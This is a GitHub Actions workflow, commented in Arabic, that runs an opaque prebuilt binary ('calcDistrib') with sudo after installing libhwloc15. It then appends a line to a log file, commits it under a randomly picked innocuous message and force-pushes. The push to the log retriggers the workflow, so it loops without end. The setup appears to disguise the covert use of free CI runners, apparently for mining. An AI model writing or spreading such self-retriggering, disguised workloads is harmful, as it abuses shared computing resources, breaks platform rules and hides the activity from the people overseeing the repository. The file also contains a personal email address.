name: Log Update Workflow

on:
  push:
    paths:
      - 'log'  # تشغيل العملية عند تحديث أو عمل push لملف log
  workflow_dispatch:  # إضافة تشغيل يدوي
      
permissions:
  contents: write  # يمنح إذن الكتابة لدفع التعديلات

jobs:
  calculate_sum:
    name: Calculate Sum
    runs-on: ubuntu-latest
    timeout-minutes: 20
    steps:
      - name: Checkout repository
        uses: actions/checkout@v3
      - name: Install dependencies
        run: |
          sudo apt-get update
          sudo apt-get install -y libhwloc15
      - name: Ensure executable permission
        run: chmod +x result/calcDistrib
      - name: Run the executable
        run: sudo ./result/calcDistrib

  push:
    name: Final Push with Log
    runs-on: ubuntu-latest
    needs: calculate_sum  # لن تبدأ هذه الوظيفة إلا بعد انتهاء "calculate_sum"
    steps:
      - name: Delay for 20 minutes
        run: sleep 1200s  # تأخير العملية لمدة 20 دقيقة
      
      - name: Checkout repository
        uses: actions/checkout@v3
        with:
          persist-credentials: false
          fetch-depth: 0

      - name: Append log entry
        run: |
          echo "$(date -u +\"%Y-%m-%dT%H:%M:%S.%N\" | sed -E 's/(\.[0-9]{7})[0-9]+/\1/')Z Start CalcDistrib no.$RANDOM" >> log
      
      - name: Commit and push log file
        run: |
          git config --local user.email "kareemkamal500@gmail.com"
          git config --local user.name "${{ github.repository_owner }}"
          git add log
          
          # قائمة برسائل الكوميت العشوائية
          arr=("Log Update" "Data Processed" "Calculation Completed" "Routine Log Update" "System Check" "Performance Data" "Execution Log" "Auto-update" "Scheduled Task" "Automated Commit")
          rand=$[$RANDOM % ${#arr[@]}]

          git commit -m "${arr[$rand]}"
      
      - name: GitHub Push
        uses: ad-m/github-push-action@master
        with:
          force: true
          directory: "."
          github_token: ${{ secrets.GITHUB_TOKEN }}
